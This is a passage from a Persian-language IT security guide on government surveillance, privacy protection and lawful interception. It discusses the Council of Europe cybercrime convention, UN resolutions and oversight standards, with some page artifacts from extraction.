ﻫﻤﺎﻥ ﺗﻌﺎﺭﻳﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ ،ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﻣـﺜ ﹰ
ﺑﺼﻮﺭﺕ ﻋﻤﺪﻱ ﻳﻚ ﻭﻳﺮﻭﺱ ﺗﻮﻟﻴﺪ ﻛﻨـﺪ ،ﺣﺘـﻲ ﺍﮔـﺮ ﻭﻳـﺮﻭﺱ
ﺗﻮﺳﻂ ﺷﺨﺺ ﺩﻳﮕـﺮﻱ ﺑـﻪ ﺷـﺒﻜﻪ ﺭﺍﻩ ﻳﺎﻓﺘـﻪ ﺑﺎﺷـﺪ ،ﺑـﺎﺯ ﻫـﻢ
ﺷﺨﺺ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ ﺩﺭ ﻗﺒـﺎﻝ ﺧﺮﺍﺑﻴﻬـﺎﻳﻲ ﻛـﻪ ﺁﻥ ﻭﻳـﺮﻭﺱ ﺩﺭ
ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ.
ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
ﺗﻮﺟﻪ ﺑﻪ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﺎﻟﺒﹰﺎ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺳﺆﺍﻻﺗﻲ
ﻼ ﺍﻳﻨﻜﻪ ﺿﻮﺍﺑﻄﻲ ﻛﻪ ﺩﻭﻟﺖ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻧﻬـﺎ ﺣـﻖ
ﻣﻲﺷﻮﺩ ،ﻣﺜ ﹰ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﭘﻴـﺪﺍ
ﻣﻲﻛﻨﺪ -ﺩﺍﺩﻩﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷـﻮﺍﻫﺪﻱ ﺑـﺮ ﺍﻧﺠـﺎﻡ ﺟـﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺗﺨﻠﻔﺎﺕ ﺑﺎﺷﻨﺪ -ﻛﺪﺍﻣﻨﺪ؟ ﺑﺴﻴﺎﺭﻱ ﺍﺯ
ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﺩﻭﻟـﺖ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ
ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨـﺪ .ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ
ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺳــﺘﻮﺭﺍﺕ ﻗــﻀﺎﻳﻲ ﺑــﺮﺍﻱ ﺑﺮﺭﺳــﻲ ﺩﺍﺩﻩﻫــﺎﻱ
ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﻳﺎ ﺣﻜﻢ ﺗﺼﺮﻑ ﻭ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ
ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺍﺟـﺎﺯﻩ
ﺭﺩﻳــﺎﺑﻲ ﺑﻼﺩﺭﻧــﮓ ٨٥ﺍﺭﺗﺒﺎﻃــﺎﺕ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ ﺍﻧﺘﻘــﺎﻟﻲ ﺭﺍ -ﻛــﻪ
ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ -ﻣـﻲﺩﻫﻨـﺪ .ﺑﺨـﺶ
ﻣﻬﻤﻲ ﺍﺯ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺗﺤﻘﻴـﻖ ﻭ ﺭﺩﻳـﺎﺑﻲ ﺍﺳـﻨﺎﺩ
Realtime Interception
85
٢٤٩
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﻭ ﮔﺰﺍﺭﺵ ﻫﺮ ﻧﻮﻉ ﺛﺒﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ
ﺩﻭﻟﺖ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﻃﺒﻖ ﻗﻄﻌﻨﺎﻣﺔ ۵۵/۶۳ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ )ﺩﺳﺎﻣﺒﺮ ،(۲۰۰۰ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ
ﻛﺸﻮﺭﻫﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺭﻭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺎﻧﻮﻥ ﺑﻪ ﺗﺼﻮﻳﺐ ﻣﻲﺭﺳﺎﻧﻨﺪ ،ﺑﺎﻳﺪ ﺍﺯ ﺁﺯﺍﺩﻳﻬﺎﻱ ﻓـﺮﺩﻱ
ﻭ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻧﻴﺰ ﻣﺤﺎﻓﻈﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻧـﺪ .ﺩﺭ ﺳـﺎﻝ ۱۹۹۰
ﻫﺸﺘﻤﻴﻦ ﻛﻨﮕﺮﺓ ﺳﺎﺯﻣﺎﻥ ﻣﻠـﻞ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﺨﻠﻔـﺎﺕ ﻭ
ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻣﺘﺨﻠﻔـﻴﻦ ،ﺩﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ ﺍﺭﺯﻳـﺎﺑﻲ،
ﻗﻮﺍﻧﻴﻦ ﺭﻭﺷﻦ ﻭ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺩﺭ ﺷﻨﺎﺳـﺎﻳﻲ ﺟـﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﭘﻴــﺸﻨﻬﺎﺩﺍﺗﻲ ﺭﺍ ﻣﻄــﺮﺡ ﺳــﺎﺧﺖ .ﺩﺭ ﺳــﺎﻝ ،۱۹۹۵
ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﺭﺍﻫﻨﻤﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﻛﻨﺘـﺮﻝ ﺟـﺮﺍﺋﻢ ﻣـﺮﺗﺒﻂ ﺑـﺎ
ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪ .ﺍﻳﻦ ﺳﻨﺪ ﻣﻔﺼﻞ ﻃﻴـﻒ ﮔـﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ
ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺟﺮﺍﺋﻢ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﻃﺮﺡ ﻛﺮﺩﻩ ﺑﻮﺩ ،ﺍﺯ ﺟﻤﻠـﻪ
ﻗﻮﺍﻧﻴﻦ ﺭﻭﺍﻝﻣﻨﺪ ،ﻗﻮﺍﻧﻴﻦ ﻣﻮﺿـﻮﻋﻪ ،ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ،
ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ،ﺍﻣﻨﻴﺖ ،ﻭ ﻧﻴﺰ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ.
.۱
ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨـﺪ ﻛـﻪ ﺑـﻪ ﺗـﺪﻭﻳﻦ،
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ ﺩﺭ ﺿـﻮﺍﺑﻂ ﻭ ﻗـﻮﺍﻧﻴﻦ
ﻣﺤﻠﻲ -ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇـﺖ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺣﻘـﻮﻕ ﻭ
ﺁﺯﺍﺩﻳﻬﺎﻱ ﺑﺸﺮ ،ﺍﺯ ﺟﻤﻠﻪ ﺣﻘﻮﻕ ﻣﺬﻛﻮﺭ ﺩﺭ ﻣﻘـﺮﺭﺍﺕ ﺳـﺎﻝ
۱۹۵۰ﻛﻨﻮﺍﻧﺴﻴﻮﻥ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺑﺮﺍﻱ ﺣﻔﻆ ﺣﻘﻮﻕ ﺑـﺸﺮ،
ﺁﺯﺍﺩﻳﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺣﻘﻮﻕ ﺑﺸﺮ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ -ﺗﻮﺟﻪ ﻻﺯﻡ ﻛﺮﺩﻩ ﺍﺳﺖ.
.۲
ﺍﻳﻦ ﺿﻮﺍﺑﻂ ﺑﺎﻳﺪ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﻃﺒﻴﻌﺖ ﺁﻧﻬﺎ ﺍﻳﺠـﺎﺏ
ﻣﻲﻛﻨﺪ ﻧﻈﺎﺭﺗﻬﺎﻱ ﻗﻀﺎﻳﻲ ﻭ ﺳﺎﻳﺮ ﻧﻈﺎﺭﺗﻬـﺎﻱ ﻣـﺴﺘﻘﻞ ﺭﺍ
ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ ،ﺑﺎﻋﺚ ﺗﻨﻈـﻴﻢ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﺷـﻮﻧﺪ ،ﻭ ﺍﺳـﺒﺎﺏ
ﻛﺎﻫﺶ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺩﺍﻣﻨﻪﺍﻱ ﻭ ﺯﻣﺎﻧﻲ ﺭﻭﺍﻟﻬﺎ ﺭﺍ ﻓـﺮﺍﻫﻢ
ﺁﻭﺭﻧﺪ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻧﻈﺎﺭﺕ
ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺭﻭﺍﻟﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺧﺎﺻـﻲ ﻛـﻪ ﻣـﺮﺗﺒﻂ ﺑـﺎ
ﻣﻨﺸﻮﺭ ﺣﻘﻮﻕ ﺑﺸﺮ ﺍﺭﻭﭘﺎ ﺑﺎﺷﺪ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﻲﺳـﺎﺯﺩ ،ﺑﻠﻜـﻪ ﺩﺭ
ﻼ ﺧﻼﺻﻪ ﺷﺪﻩ
ﺗﺼﻤﻴﻤﺎﺕ ﺩﺍﺩﮔﺎﻩ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺣﻘﻮﻕ ﺑﺸﺮ )ﻛﻪ ﺫﻳ ﹰ
ﺍﺳﺖ( ﻗـﻮﺍﻧﻴﻦ ﻧﻈـﺎﺭﺕ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻫﻤﭽـﻮﻥ ﻛﺎﻧـﺎﺩﺍ ﻭ ﺍﻳـﺎﻻﺕ
ﻣﺘﺤﺪﻩ -ﻛﻪ ﺭﻭﺍﻟﻬﺎﻱ ﻗﻮﻱ ﻭ ﻣﺴﺘﻘﻞ ﺩﺭ ﻗﻀﺎﻭﺕ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺍﺭﻧـﺪ -ﺩﻳـﺪﻩ ﻣـﻲﺷـﻮﺩ .ﺩﺭ ﺟﻮﺍﻣـﻊ ﺩﺭﺣـﺎﻝ
ﺗﻮﺳﻌﻪ ﻭ ﺩﺭﺣﺎﻝ ﮔﺬﺍﺭ ﻛﻪ ﺩﺭ ﺁﻧﻬـﺎ ﻗـﻮﺍﻧﻴﻦ ﻣـﺸﺨﺺ ﻭ ﺗﻌﺮﻳـﻒ
ﺷﺪﻩﺍﻱ ﺩﺭ ﻣﻮﺭﺩ ﺗﺤﻘﻴﻖ ،ﺗﺼﺮﻑ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺩﻧﻴـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ
ﺍﻳﻨﺘﺮﻧــﺖ ﻧﻴــﺰ ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ،ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ ﺩﺭ ﺯﻣﻴﻨــﻪﻫــﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﺗﻮﺳﻌﺔ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗﻮﻱ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﻭﻟـﺖ
ﺗﻮﺟﻪ ﺟﺪﻱ ﺷﻮﺩ.
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻈﺎﻣﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺣﻘﻮﻗﻲ ﺩﻧﻴﺎ ،ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺠﺎﺯ ﺍﺳﺖ ،ﺍﻣﺎ ﺗﺤﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﻭﺷﻦ ﻗﺎﻧﻮﻧﻲ؛
ﻭ ﺍﻟﺒﺘﻪ ﺑﺎﺯ ﻫﻢ ﺑﺮﺍﻱ ﺁﻥ ﺑﻪ ﺩﻻﻳﻞ ﻛﺎﻓﻲ ﻧﻴﺎﺯ ﺍﺳﺖ ،ﻛﻪ ﺍﻳﻦ ﺍﻣـﺮ
ﻻ ﺑﻪ ﻣﻌﻨﺎﻱ ﺗﺼﺪﻳﻖ ﻗﺎﺿﻲ ﻣﻲﺑﺎﺷﺪ.
ﺩﺭ ﻧﻈﺎﻣﻬﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻌﻤﻮ ﹰ
ﺩﻭﻟﺘﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﺒﺎﺣﺚ ﺭﺩﻳﺎﺑﻲ ﻭ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺩﻩﻫﺎ ﻣﻲﭘﺮﺩﺍﺯﻧـﺪ
ﺑﺎﻳﺪ ﺑﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺩﻭﻟـﺖ ﺑـﻪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ
Charter of Fundamental Rights of the EU
86
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﮔﺰﺍﺭﺷﮕﻴﺮﻱ ﺍﺟﺒﺎﺭﻱ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ
ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺗﻮﺳـﻂ ﺩﻭﻟـﺖ ﻣﻨﺠـﺮ ﺑـﻪ
ﻧﻘﺾ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﺩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ
ﺍﺯ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺤــﺎﻓﻈﺘﻲ ﺑــﻴﺶ ﺍﺯ ﭘــﻴﺶ ﺍﺣــﺴﺎﺱ ﻣــﻲﮔــﺮﺩﺩ.
ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ OECDﺩﺭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴـﺖ
ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻇﻬﺎﺭ ﻣـﻲﻛﻨـﺪ" :ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ ﻛﻪ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺍﺭﺯﺷﻬﺎﻱ
ﻣﺸﺨﺺﺷـﺪﻩ ﺍﺯ ﻃـﺮﻑ ﺟﻮﺍﻣـﻊ ﺩﻣﻮﻛﺮﺍﺗﻴـﻚ ﺍﺯ ﺟﻤﻠـﻪ ﺁﺯﺍﺩﻱ
ﺗﺒﺎﺩﻝ ﺍﻓﻜﺎﺭ ﻭ ﺍﻳﺪﻩﻫﺎ ،ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋـﺎﺕ ،ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﻮﺩﻥ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ،ﻭ
ﺷﻔﺎﻓﻴﺖ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ".ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺳﻴﺎﺳﺖ ﺍﺻﻠﻲ ﺍﺗﺤﺎﺩﻳﻪ ﺍﺭﻭﭘﺎ ﺍﺳـﺖ
ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻨﺪ ۸ﻣﻌﺎﻫﺪﺓ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺣﻘـﻮﻕ ﺑـﺸﺮ ﻧﻴـﺰ
ﻣﺸﺨﺺ ﺷﺪﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺑﻨـﺪﻫﺎﻱ ۷ﻭ ۸ﻣﻨـﺸﻮﺭ ﺣﻘـﻮﻕ
ﺍﺳﺎﺳﻲ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ٨٦ﺍﺣﺘـﺮﺍﻡ ﺑـﻪ ﺣﻘـﻮﻕ ﺧـﺎﻧﻮﺍﺩﻩ ﻭ ﺯﻧـﺪﮔﻲ
ﺷﺨﺼﻲ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻋﻨﻮﺍﻥ ﻣـﻲﻧﻤﺎﻳـﺪ.
ﺩﺭ ﺟﻮﺍﻣﻊ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﺩﺭﺣﺎﻝ ﮔﺬﺍﺭ ،ﻧﻈﺎﺭﺕ ﺑﻲﺣـﺪ ﻭ ﻣـﺮﺯ
ﻼ ﺍﺯ
ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻬﻮﻡ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ ﻛـﺎﻣ ﹰ
ﺑﻴﻦ ﺑﺒﺮﺩ.
ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺳﺘﺎ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺻﺮﺍﺣﺘﹰﺎ ﻋﻨﻮﺍﻥ ﻣﻲﻛﻨﺪ ﻛﻪ
ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺑﺮﺭﺳﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺗـﺎ ﺣـﺪﻱ
ﻣﺠﺎﺯ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻣﻨﺸﻮﺭ ﺣﻘـﻮﻕ
ﺑــﺸﺮ ﺍﺭﻭﭘــﺎﻳﻲ ﺁﻧــﺮﺍ ﻧﻘــﺾ ﻧﻜﻨــﺪ .ﺑﻨــﺪ ۱۵ﻣﻌﺎﻫــﺪﺓ ﺟــﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺯﻳﺮ ﺍﺳﺖ:
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٥٠
ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ .ﺗﺠﺮﺑﻴـﺎﺕ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ،
ﺭﺍﻫﻨﻤــﺎﻱ ﻣﻔﻴــﺪﻱ ﺩﺭ ﺍﻳــﻦ ﻣﻮﺿــﻮﻉ ﻫــﺴﺘﻨﺪ .ﺑــﺮ ﺍﺳــﺎﺱ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﺩﻳﺎﺑﻲ
ﻗﺎﻧﻮﻧﻤﻨﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻤﻜﻦ ﺳﺎﺯﻧﺪ:
•
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﺩﻳﺎﺑﻲ ﺷﻔﺎﻑ ﻭ ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ
ﺑﺎﺷﻨﺪ؛ ﻭ ﺑﻄﻮﺭ ﻛﺎﻣـﻞ ،ﺑـﺼﻮﺭﺕ ﺷـﻔﺎﻑ ﻭ ﺑـﺎ ﻣﻮﺷـﻜﺎﻓﻲ
ﻻﺯﻡ ،ﺷﻬﺮﻭﻧﺪﺍﻥ ﺭﺍ ﺍﺯ ﭼﮕﻮﻧﮕﻲ ﻭ ﺷـﺮﺍﻳﻂ ﻧﻈـﺎﺭﺕ ﺁﮔـﺎﻩ
ﺳﺎﺯﻧﺪ؛
•
ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻣﻘﺎﻡ ﻣﺴﺘﻘﻞ
)ﺗﺮﺟﻴﺤﹰﺎ ﻳﻚ ﻗﺎﺿـﻲ( ﺻﻮﺭﺕ ﮔﻴـﺮﺩ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺗﻘﺎﺿـﺎﻱ
ﻛﺘﺒﻲ ﻭ ﺍﺭﺍﺋﻪ ﺩﻻﻳﻞ ﻭ ﺍﺳﻨﺎﺩ ﻣﻌﺘﺒﺮ ﻭ ﻗﺎﺑـﻞ ﻗﺒـﻮﻝ ﺍﻧﺠـﺎﻡ
ﺷﻮﺩ؛
•
ﻧﻈﺎﺭﺕ ﺗﻨﻬﺎ ﻣﺤـﺪﻭﺩ ﺑـﻪ ﺑﺮﺭﺳـﻲ ﺩﺭﮔﻴﺮﻳﻬـﺎﻱ ﺟـﺪﻱ ﻭ
ﺧﺎﺹ ﺑﺎﺷﺪ؛
•
ﺗﺄﻳﻴﺪ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ ﺩﻻﻳﻞ ﻗـﻮﻱ ﻛـﻪ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ
ﻟﺰﻭﻡ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﻩ ﺗﺨﻠﻔﺎﺕ ﺍﺳﺖ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ؛
•
ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺗﻨﻬﺎ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺳﺎﻳﺮ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ؛
•
ﺍﺷﺨﺎﺹ ﻭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻧـﺪ ﺑـﺎ
ﺟﺰﺋﻴﺎﺕ ﻛﺎﻣﻞ ﻣﺸﺨﺺ ﺷﻮﻧﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﺧـﺼﻮﺹ ﻣـﻮﺍﺭﺩ
ﻛﻠﻲ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﻧﺒﺎﺷﻨﺪ؛
•
